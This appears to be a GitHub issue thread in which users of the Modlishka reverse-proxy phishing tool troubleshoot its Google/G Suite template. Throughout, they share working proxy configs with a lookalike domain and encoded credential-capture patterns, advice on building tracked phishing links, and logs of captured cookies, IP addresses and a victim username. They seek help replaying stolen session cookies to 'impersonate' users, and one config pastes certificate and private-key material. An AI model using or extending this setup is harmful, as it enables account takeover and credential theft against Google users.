Unable to sign in to your Google Account: Delete cookies

[johnnash999]

geting this issue after gmail login

and domain not redirecting to . accounts.mywebsite.com

but to -> . https://gud2a71rxjfena8.MYWEBSITE.COM/mail/

all links are getting similar sub domains.

[drk1wi]

Please paste in your config.

[drk1wi]

do you also mean the control panel "impersonation" function?

[drk1wi]

closing as resolved, due to lack of response.

[infosecwatchman]

@johnnash999 and @drk1wi Did either of y'all figure it out? Also, where can I find the raw cookie so as to use with the chrome console and login via that way? And do you know the syntax for doing that in the console?

[infosecwatchman]

@putterpanda So you are getting the username and password but not the user id or cookie?

[orlyjamie]

@drk1wi @GregorioSecurity @johnnash999 Definitely still an issue. I get the password fine but not the user ID or any other info (and client-side browser see's the same Google cookie clearing help page).

Confirmed in Chrome Version 74.0.3729.157 (Official Build) (64-bit) Modlishka - v.1.1

CONFIG - templates/google.com_gsuite.json

{
  "proxyDomain": "google.com.mytrustworthydomain.com",
  "listeningAddress": "0.0.0.0",
  "proxyAddress": "",
  "target": "google.com",
  "targetResources": "content.googleapis.com,www.gstatic.com,ssl.gstatic.com,ogs.google.com,accounts.google.com,clients1.go$
  "targetRules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "ident",
  "trackingParam": "ident",
  "useTls": true,
  "jsRules":"",
  "debug": false,
  "forceHTTPS": false,
  "forceHTTP": true,
  "dynamicMode": false,
  "logPostOnly": false,
  "disableSecurity": false,
  "log": "google.log",
  "plugins": "all",
  "credParams": "dHJ1ZVxdLCIoKD86XHcrW1wuXC1cX10pezAsfVx3KykiXQ==,XGJudWxsLFxbIihbYS16QS1aMC05IiEiIyQlJicoKSorLC0uLzo7PD0+P$
  "cert": "",
  "certKey": "",
  "certPool": ""
}

[orlyjamie]

@putterpanda So you are getting the username and password but not the user id or cookie?

No, I am only getting the password. Using latest version. No Golang issues either.

[infosecwatchman]

When creating the phishing link you want to make sure that your URL looks like this. https://loopback.modlishka.io/?id=[UUID_identifier] and replace [UUID_identifier] with an ID from here: https://www.uuidgenerator.net/ This will give you the ID but still trying to figure out the tracking parameter for the correct session cookie. Let me know if get the username or not after this.

[orlyjamie]

Hey @GregorioSecurity Have used both UUID's and without, with -debug flag with no luck.

I'll keep debugging locally but for what it's worth - @drk1wi I have included my google.log.

[orlyjamie]

Slowly starting to piece it together:

1. Attempted to login without going via Modlishka, it appears my Gsuite account was requesting recovery e-mail verification :

https://accounts.google.com/signin/v2/challenge/kpe?service=mail&passive=true&rm=false&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&ss=1&scc=1&ltmpl=default&ltmplcache=2&emr=1&osid=1&flowName=GlifWebSignIn&flowEntry=ServiceLogin&cid=4&navigationDirection=forward&TL=APDPHBCAEKsQsha-sLLVr1OQ1pEEKkqUUl6JngSxUuQEK4q1nJf5xmux-zMco0cr

Which according to my google.log file is around the time in the process that I get 302'd to the Cookie Clearing help page.

[infosecwatchman]

Have you tried running in incognito mode?

[orlyjamie]

Have you tried running in incognito mode?

I only run in incognito.

[infosecwatchman]

Trying changing https://loopback.modlishka.io/?id=[UUID_identifier] to https://loopback.modlishka.io/?ident=[UUID_identifier]

[orlyjamie]

Trying changing https://loopback.modlishka.io/?id=[UUID_identifier] to https://loopback.modlishka.io/?ident=[UUID_identifier]

Okay this solves the UUID issue. But the problem still remains:

1. User is redirected to :

/accounts/answer/6240232?visit_id=636942149714504307-3824060973&hl=en&rd=1

2. No Username is captured.

[infosecwatchman]

Can you send me the output of your terminal after you log in? and can you send me a copy of your template config?

[orlyjamie]

My template config is in the previous post. The log output is below: google_fail.log

[orlyjamie]

Can you send me the output of your terminal after you log in? and can you send me a copy of your template config?

Is yours working now?

[infosecwatchman]

I have not been able to properly collect Google's session cookie in any tool that I've used but I do get everything else. Can you try to log in again and screenshot your terminal for me, please? I am not currently in front of my project right now.

[orlyjamie]

Interesting observation, the UUID is being injected in COOKIE values before being sent to Google. This does not seem like it is intended functionality. See 44jww-2983ha-fhwhwa

COOKIES
======
Timestamp: Friday, 24-May-19 04:44:35 UTC
======
RemoteIP: 212.94.103.17:60065
======
UUID: 44jww-2983ha-fhwhwa
======
URL: https://accounts.google.com
======
GAPS=1:_WqK0WB9CqHjrRlcKjfFy2bFlsoy-ZnAmcK29iT0FyReom4RV822ouOt2eJSiFGt2ii9JpG1oBuq8_JdJtkZ97NYJbAUGw:cDUd5KKcfXuIj3_o;Path=/;Expires=Sun, 23-May-2021 04:44:35 GMT;;HttpOnly;Priority=HIGH
======

REQUEST
======
Timestamp: Friday, 24-May-19 04:44:36 UTC
======
RemoteIP: 212.94.103.17:54333
======
UUID: 44jww-2983ha-fhwhwa
======
GET /accounts/answer/32050?hl=ru&ctx=ch_CheckCookie HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Cookie: -2983ha-fhwhwa

[infosecwatchman]

Sorry @putterpanda I am out of my depth at this point. I do not know this code well enough to tell you if that is correct or not, or how to fix it.

[drk1wi]

Hi, I believe that the bug is that the target domain is part of the proxy domain name.

"proxyDomain": "google.com.mytrustworthydomain.com", "target": "google.com",

Can you try if everything works for you with just the "proxyDomain": "mytrustworthydomain.com" ?

[imemyself9327]

I am having the same issue getting username password just not able to sign in or impersonate says unable to login delete cookies i am using UUID

[imemyself9327]

Is there any way i can go back to previous version that worked absolutely fine for me

[drk1wi]

you can use the TAG option on the repository. Though, I am not sure what's the issue here since I tried the current branch and everything is working fine.

[infosecwatchman]

@drk1wi Would you mind telling us exactly the environment you are testing on so we can copy the environment, to ensure the best chance of success.

[drk1wi]

It's just: go version go1.12.1 darwin/amd64 and ./dist/proxy -config templates/google.com_gsuite.json with self-signed CA cert

[imemyself9327]

i m able to sign in get username and password with uuid but when i impersonate it just says cookie mismatch i guess this error should be for everyone i just tried the previous version using the tag yet getting the same error https://imgbbb.com/image/fpUrt https://imgbbb.com/image/fpjeD if you can please tell me the meaning of this error xxxxxxxxxxxxil:443] via --> [https://google.com] [Tue May 28 15:59:49 2019] INF User tracking: Redirecting client to / 2019/05/28 21:29:50 http: multiple response.WriteHeader calls [Tue May 28 15:59:50 2019] WAR DecodeSubdomain [!www.google.com] contains invalid characters : %!s(MISSING) 2019/05/28 21:29:50 http: proxy error: dial tcp: lookup un5gmtkzgjfbpmm5pm1g.google.com on 8.8.8.8:53: no such host [Tue May 28 16:00:25 2019] WAR rewriteResponse took 1.07956457s [Tue May 28 16:00:25 2019] WAR rewriteResponse took 1.154344633s [Tue May 28 16:00:25 2019] WAR rewriteResponse took 1.275840317s 2019/05/28 21:31:10 http: proxy error: context canceled [Tue May 28 16:03:04 2019] INF [P] Tracking victim via initial parameter 95bdb404-fbec-4039-9e02-7974e764e59f [Tue May 28 16:03:34 2019] INF Username collected ID:[95bdb404-fbec-4039-9e02-7974e764e59f] username: stevenjohnson

this is my config file "listeningPort": "443", "listeningAddress": "0.0.0.0", "target": "https://google.com", "targetResources": "content.googleapis.com,www.gstatic.com,ssl.gstatic.com,ogs.google.com,accounts.google.com,clients1.g$ "targetRules": "", "terminateTriggers": "", "terminateRedirectUrl": "", "trackingCookie": "ident", "trackingParam": "ident", "useTls": true, "jsRules":"", "debug": false, "logPostOnly": false, "disableSecurity": false, "log": "google.log", "plugins": "all", "credParams": "dHJ1ZVxdLCIoW15cV10rKSJd,XGJudWxsLFxbIihbYS16QS1aMC05IiEiIyQlJicoKSorLC0uLzo7PD0+P0BeX2B7fH1+XSspIixudWxs$ "cert": "-----BEGIN CERTIFICATE-----\nMIIGZDCCBUygAwIBAgISA8CkGyF8hX1yJyc6w62qPQeeMA0GCSqGSIb3DQEBCwUA\nMEoxCzAJBgNVBAYT$ "certKey": "-----BEGIN RSA PRIVATE KEY-----\nMIIJJwIBAAKCAgEAhDXoxrfwXD+GhsfS2DNon2cHPReZTs3hG1WhiEWxQLCROXrc\nvDDDd3j18$ "certPool": "" }

[drk1wi]

Please use the template file as the base and the latest version

[imemyself9327]

i am using template file as the base and i tried both the version i am getting the same error

2019/05/28 21:29:50 http: multiple response.WriteHeader calls [Tue May 28 15:59:50 2019] WAR DecodeSubdomain [!www.google.com] contains invalid characters : %!s(MISSING) 2019/05/28 21:29:50 http: proxy error: dial tcp: lookup un5gmtkzgjfbpmm5pm1g.google.com on 8.8.8.8:53: no such host

[imemyself9327]

so when i impersonate it just says cookie mismatch